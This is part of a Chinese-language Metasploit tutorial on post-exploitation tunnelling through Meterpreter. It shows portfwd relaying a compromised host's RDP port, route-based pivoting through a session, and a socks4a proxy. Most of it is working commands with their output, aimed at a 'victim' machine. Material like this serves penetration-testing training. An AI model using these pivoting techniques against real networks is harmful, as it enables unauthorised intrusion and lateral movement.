Metasploit渗透技巧:后渗透Meterpreter代理

发表于:2015-12-28 11:03

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:月黑风寒    来源:51Testing软件测试网采编

分享:
  0×01 meterpreter基本隧道代理
  好,现在已经有一个反弹回来的权限,下面介绍meterpreter隧道代理的几种方法
  1.portfwd
  portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听.使用方法如下:
  meterpreter > portfwd
  0 total local port forwards.
  meterpreter > portfwd  -h
  Usage: portfwd [-h] [add | delete | list | flush] [args]
  OPTIONS:
  -L <opt>  The local host to listen on (optional).
  -h        Help banner.
  -l <opt>  The local port to listen on.
  -p <opt>  The remote port to connect to.
  -r <opt>  The remote host to connect to.
  使用实例介绍:
  反弹10.1.1.129端口3389到本地2222并监听那么可以使用如下方法:
  meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
  [*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
  meterpreter > portfwd
  0: 0.0.0.0:2222 -> 10.1.1.129:3389
  1 total local port forwards.
  已经转发成功,下面来验证下:
  root@kali:~# netstat -an | grep "2222"
  tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN
  可以看到已经成功监听2222端口
  接着连接本地2222端口即可连接受害机器10.1.1.129 3389端口,如下:
  root@kali:~# rdesktop 127.1.1.0:2222
  可以看到,已经成功连接到10.1.1.129 的3389端口
  2. pivot
  pivot是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境,下面介绍下pivot的搭建和使用方法
  使用方法route add   目标i或ip段     Netmask 要使用代理的会话,通过实例来说明:
  在metasploit添加一个路由表,目的是访问10.1.1.129将通过meterpreter的会话 1 来访问:
  msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1
  [*] Route added
  msf exploit(handler) > route print
  Active Routing Table
  ====================
  Subnet             Netmask            Gateway
  ------             -------            -------
  10.1.1.129         255.255.255.255    Session 1
  这里如果要代理10.1.1.129/24 到session 1,则可以这么写
  route add 10.1.1.0 255.255.255.0 1
  到这里pivot已经配置好了,你在msf里对10.1.1.129进行扫描(db_nmap)或者访问(psexe 模块,ssh模块等)将通过代理session 1这个会话来访问。
  如果想通过其他应用程序来使用这个代理怎么办呢,这时候可以借助 metasploit socks4a提供一个监听隧道供其他应用程序访问:
  首先使用 socks4a并且配置,监听端口
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The address to listen on
SRVPORT  1080             yes       The port to listen on.
Auxiliary action:
Name   Description
----   -----------
Proxy
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the socks4a proxy server
  查看监听端口
  root@kali:~# netstat -an | grep "1080"
  tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN
32/3<123>
100家互联网大公司java笔试题汇总,填问卷领取~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2023
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号